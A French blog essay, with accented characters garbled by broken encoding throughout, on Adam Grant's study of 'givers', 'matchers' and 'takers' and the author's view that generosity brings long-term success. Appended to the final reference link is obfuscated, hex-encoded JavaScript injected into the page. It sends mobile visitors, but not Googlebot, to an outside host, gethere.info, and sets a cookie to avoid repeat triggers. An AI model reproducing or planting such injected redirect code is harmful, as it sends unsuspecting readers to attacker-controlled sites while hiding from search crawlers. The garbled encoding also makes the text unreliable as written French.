Selon le Prof. Adam Grant, les « trop » gA�nA�reux, c’est-A�-dire ceux qui prA�fA?rent les autres A� eux-mA?mes en pA?tissent sur le court terme mais cela est profitable sur le long terme. [1] Le professeur explique que l’on peut catA�goriser les gens en trois groupes que sont les « preneurs », les « mA�nageurs » et les « donneurs ». Les « preneurs » sont ceux qui se soucient d’abord d’eux-mA?mes tandis que les « donneurs » sont ceux qui ont tendance A� faire passer les autres avant leur personne. Les « mA�nageurs » sont quelque part entre les deux. Ils sont volontaires pour aider les autres mais ils le font avec l’attente de voir la pareille en retour.

Selon une A�tude qu’il a menA�e sur des ingA�nieurs, des commerciaux et des A�tudiants en mA�decine, il a pu montrer que ceux qui avaient une personnalitA� de « donneur » A�taient les moins performants dans leur domaine… mais aussi les plus performants, bizarrement. C’est-A�-dire que les moins bons sont des « donneurs » mais les meilleurs sont aussi des « donneurs ». Ils reprA�sentent les 25% du dessus ainsi que les 25% du fond tandis que les « preneurs » et les « mA�nageurs » se situent dans les 50% du milieu. [2]

Il pense que cela s’explique par le fait qu’A?tre trop gA�nA�reux est un dA�savantage sur le court terme, surtout si c’est au dA�triment des propres objectifs et besoins de la personne, mais cela est un avantage sur le long terme car les gens seront davantage enclins A� aider cette personne le moment venu.

« En fait, vous apprenez des choses en aidant les autres A� rA�soudre leurs problA?mes et il y a un sA�rieux capital social qui est construit, mais il prend du temps A� se former. »

Je trouve personnellement cette A�tude interpellante car elle corrobore la��idA�e qua��A?tre parmi les A�A�gentilsA�A� est en rA�alitA� la meilleure option sur le plan stratA�gique, matA�riel et spirituel.A�Je m’explique. D’habitude, on a tendance A� croire que les gentils qui gagnent c’est rA�servA� aux films et aux contes de fA�es, que la rA�alitA� est toute autre. Alors oui, la rA�alitA� n’a rien A� voir avec les films et les contes de fA�es, par dA�finition! Et je ne crois pas non plus que l’A?tre humain soit fonciA?rement bon ni fonciA?rement mauvais. Je pense que l’A?tre humain a une force A�norme qu’on peut appeler le libre arbitre ou tout simplement le choix de ses actions. Certains me diraient qu’en rA�alitA� l’A?tre humain ne fait aucun choix, qu’il est aliA�nA� par le systA?me et les contraintes de la vie ou que de toute faA�on, ce qui doit arriver arrivera et il ne sert A� rien de s’y opposer. A mes yeux, il s’agit lA� de rA�actions de gens qui ont dA�jA� baissA� les bras et qui justifient leur forme propre de fatalisme soit par l’influence de ce qui les dA�passe soit par leur mauvaise interprA�tation du « destin ».

Est-ce que quelqu’un vous a obligA� A� lire cet article ? Non. Si vous le dA�cidez, est-ce que vous pouvez arrA?ter de le lire ? Oui. Dans le cas de la vente d’une voiture, est-ce que vous dA�cidez soit de cacher un dA�faut, pour en tirer un plus grand bA�nA�fice, soit d’A?tre transparent, pour A?tre intA?gre dans la transaction? Oui. C’est ce que, moi, j’appelle le libre arbitre. De la mA?me maniA?re, vous choisissez si vous prenez de votre temps pour rA�gler le problA?me d’autrui ou si vous le gardez pour vos propres besoins et objectifs immA�diats. Fondamentalement, vous dA�cidez donc de qui vous A?tes dans votre relation aux autres, de si vous A?tes un « donneur », un « mA�nageur » ou un « preneur ». Trop nombreux sont, A� mes yeux, ceux qui pensent que pour « rA�ussir » dans la vie, il faut A?tre un « chacal ». Mon humble expA�rience montre jusqu’ici que ce sont les « chacals » qui rA�ussissent le moins bien. Encore faut-il A?tre d’accord sur la notion de rA�ussite dans la vie.

RA�ussir dans la vie est devenu synonyme, pour beaucoup, de richesse, de notoriA�tA� et/ou d’accomplissements en termes d’obtention d’A�tiquettes diverses et variA�es allant de « Manager » A� « Professeur » en passant par « Chef d’entreprise » ou « Businessman ». L’A?tre humain est tellement fort pour se donner des titres et pour s’enorgueillir de cela. Franchement, pensez-y, les gens que vous apprA�ciez rA�ellement, avec lesquels passer du temps est un plaisir authentique et non intA�ressA�, est-ce que vous les apprA�ciez pour leur titre ? Pour leur argent ? Pour leur influence ? Ou est-ce que vous les apprA�ciez pour leur noblesse de caractA?re, leur gentillesse et le temps qu’ils ont dA�jA� passA� pour vous, de faA�on dA�sintA�ressA�e, quand vous en avez eu besoin ? J’ai l’intime conviction que tous ceux qui lisent ceci s’accorderont sur le fait que A�a n’est pas l’A�tiquette qui fait la valeur rA�elle d’une personne. Au mieux, A�a fait sa valeur « matA�rielle », sa valeur de marque, sa valeur superficielle, en somme.

Ceux qui se rendent compte de cela auront dA�jA� fait le choix d’A?tre des « donneurs » ou au moins des « mA�nageurs », ceux qui voient le monde comme une jungle fA�roce resteront par contre dans leur philosophie de « preneurs ». Ce vers quoi semble tendre l’A�tude citA�e en dA�but d’article, c’est que, en dA�finitive, ce sont ceux qui sont bienveillants et patients qui rA�ussiront le mieux, les exceptions confirmant la rA?gle. Ceux qui sont altruistes et attentionnA�s. Autant de qualificatifs qu’on souhaiterait tous voir chez ceux que l’on appellerait avec sincA�ritA� des amis. Parce que l’argent, le titre et l’influence sont des choses qui sont vouA�es A� disparaA�tre, tA?t ou tard. Projetez-vous par la pensA�e dans 20, 30, 40, 50 ans. Quand votre vue aura baissA�, quand vos cheveux vous auront dA�sertA� ou attesteront par leur couleur que le passA� est plus long que le futur, telle une montagne enneigA�e. Quand votre A�nergie se sera fanA�e et que les richesses que vous aurez accumulA�es ne pourront rien pour vous consoler. Essayez de regarder en arriA?re, qu’aimeriez-vous y voir ? Une vie fonciA?rement solitaire, durant laquelle vous avez gravi les A�chelons un par un, A� la sueur de votre front, certes, mais aussi en marchant sur les pieds d’autres par moment et au dA�triment de vos relations sociales ? Ou une vie remplie de satisfaction d’avoir fait le bien, d’avoir contribuA� quand vous l’avez pu A� rA�soudre le problA?me des autres, d’avoir A�tA� aidA�, gratuitement, quand vous-mA?me avez eu besoin qu’on retire une A�pine de votre pied ? De plus, toujours en nous rA�fA�rant A� l’A�tude, c’est en A�tant le « gentil » que vous rA�ussirez mieux, au sens matA�riel de la rA�ussite, du moins sur le long terme.

Etre quelqu’un de bien est donc une triple rA�ussite, la premiA?re rA�ussite, immA�diate celle-lA�, A�tant d’attirer autour de vous des gens bienveillants et potentiellement dA�sintA�ressA�s, A� votre instar. La deuxiA?me rA�ussite, celle-lA� diffA�rA�e, est la rA�ussite matA�rielle puisque ce sont les bienveillants qui seront les plus A� mA?me, A� terme, d’A?tre plus performants et meilleurs dans leur domaine. La troisiA?me rA�ussite possA?de 2 facettes selon vos convictions. Une facette ancrA�e dans le prA�sent et une facette ancrA�e dans le futur lointain. Il concerne le cA?tA� spirituel de la chose. La facette dans le prA�sent est la satisfaction d’avoir fait quelque chose de bien, le sentiment d’A?tre quelqu’un de bien. La facette dans le futur concerne ceux qui croient en une forme quelconque de jugement dans une vie aprA?s la mort. Je conA�ois trA?s difficilement un jugement qui ne rA�compense pas la bontA� et la bienveillance et qui ne rA�prouve pas l’A�goA?sme et la poursuite de l’enrichissement, quel qu’il soit, s’il doit se faire au dA�triment d’autrui.

 

[1] http://www.independent.co.uk/news/science/psychologist-why-nice-guys-really-do-finish-last-and-why-that-is-not-necessarily-a-bad-thing-a6669216.html?cmpid=facebook-post

[2] http://time.com/4050924/the-science-behind-why-nice-people-finish-last-and-how-to-fix-that/?xid=homepagevar _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}